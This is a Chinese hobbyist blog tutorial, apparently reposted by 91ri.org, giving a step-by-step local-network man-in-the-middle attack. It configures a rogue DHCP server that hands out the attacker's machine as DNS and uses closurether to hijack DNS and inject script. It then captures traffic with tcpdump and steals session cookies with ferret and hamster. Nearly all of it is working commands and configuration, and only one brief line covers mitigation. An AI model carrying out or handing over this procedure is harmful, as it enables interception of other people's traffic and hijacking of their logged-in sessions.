前段时间redrain大神和一个学院派教授争执最后连国民老公—-王思聪都来观战啦!! 局域网再次进入了公众的视野~ 局域网内无隐私! 这两天没什么事情查了查中间人攻击 结果发现网络上面的资料并不是很完全 所以写了这篇文章给小黑们进行参考 本人水平有限 大牛们不喜勿喷。。。
本次的中间人攻击使用DHCP来劫持DNS 个人感觉测试了几回后效果比arp欺骗要好很多
路由器:192.168.101.202 netmask:255.255.255.0
本机地址:192.168.101.108
Node.js
Closurether
tcpdump
Ferret
Hamster
1
2
3
4
5
6
7
8
9
|
wget http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz
tar zxvf node-v0.8.7.tar.gz
cd node-v0.8.7
./configure
make install
|
这个软件是做DNS的转发以保证DHCP的客户端的正常上网
node安装完成后则能执行
1
|
npm install -g closurether
|
一般的会出现错误
SSL Error: SELF_SIGNED_CERT_IN_CHAIN
解决办法:
1
2
3
|
root@kali:~/node-v0.8.7# npm install npm -g –ca=null
root@kali:~/node-v0.8.7# npm config set ca=”"
|
再次执行
1
|
npm install -g closurether
|
若出现
一直在等待,,果断关掉!!
重新执行
1
|
root@kali:~/node-v0.8.7#make install
|
执行closurether 出现
说明closurether 安装成功
1
|
apt-get install dhcp3-server
|
注意:我们通过路由器的DHCP给我们分配ip地址 所以这块的interface不用配置成静态
1
2
3
4
5
|
cd /etc/dhcp
mv dhcpd.conf dhcpd.conf..stock
nano dhcpd.conf
|
配置如下:
1
|
option domain-name-servers 192.168.101.108;
|
#DNS服务器 本机地址
1
2
3
4
5
6
7
8
9
|
default-lease-time 6000;
max-lease-time 800000;
ddns-update-style none;
authoritative;
log-facility local7;
|
#subnet配置网络的基本信息
1
2
3
|
subnet 192.168.101.0 netmask 255.255.255.0{
range 192.168.101.1 192.168.101.254;
|
#DHCP分配的地址池
1
|
option routers 192.168.101.202;
|
#路由地址
1
|
option broadcast-address 192.168.101.255;
|
#广播地址
1
2
3
4
5
|
default-lease-time 6000;
max-lease-time 8000000;
option domain-name-servers 192.168.101.108;
|
#DNS服务器 (本机)
}
使用
1
|
/etc/init.d/isc-dhcp-server start
|
启用DHCP服务 如果出错则从/var/log/syslog 查看错误提示
1
|
root@kali:~# closurether
|
启动后则能看到劫持到的DHCP客户端的详细DNS记录
找到extern这个文件
1
2
3
|
find / -name extern.js
nano extern.js
|
加入注入内容
弹窗
用tcpdump窃听网络接口
1
|
执行 tcpdump -i eth0 -w /usr/share/hamster-sidejack/test.cap
|
这个过程可能相当的漫长。。。
还是会拼人品的。。。
不过耐心会有更多的收获哦!!
监听结束后用ferret处理cap
这里我要吐槽一下 ferret这个东西太坑了 只在32位的kali上有 64位是没有的
这里千万要注意 不要看到ferret就去apt-get install ferret!!!!!
软件源中的ferret和我们用的kali自带的ferret不是一个软件!!
一旦安装就覆盖掉了原来的软件 更坑的是网上找了好多帖子都没有这个小软件!
从/usr/bin中将ferret拷到/usr/share/hamster-sidejack
从/usr/share/hamster-sidejack中执行
1
|
ferret –r /usr/share/hamster-sidejack/test.cap
|
查看hamster.txt 如果有内容是DNS的记录则说明执行成功
然后将hamster.txt改名为ferret.txt
启用hamster代理 查看劫持到的cookies
需要先清理本机cookies 以免冲突
1
|
root@kali:~#cd /usr/share/hamster-sidejack //使hamster从/usr/share/hamster-sidejack查找ferret.txt
|
1
|
root@kali:~#hamster
|
修改路由器的代理设置 访问http://hamster/
提交adapters(适配器)就可看到
对于这种攻击并没有什么好的办法解决
只有使用静态的ip地址分配
可是普通的家庭网络有几个人不使用DHCP而静态配置网络呢
配置静态的DNS服务器可有效的防止DNS劫持
参考资料:http://www.freebuf.com/articles/web/43157.html
91ri.org:本来关于内网欺骗的文章已经很多了,所以本文原来是不准备发布的,但后来听说作者是个高中生,我们惊讶高中生在学业压力之余还能对技术有所研究,同时关注业界动态,这让我们回想起自己“不堪回首”的高中时代。所以我们还是发了这篇,也希望能鼓励下这位小朋友继续努力。本文所涉程序git上都有,请自行查找。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号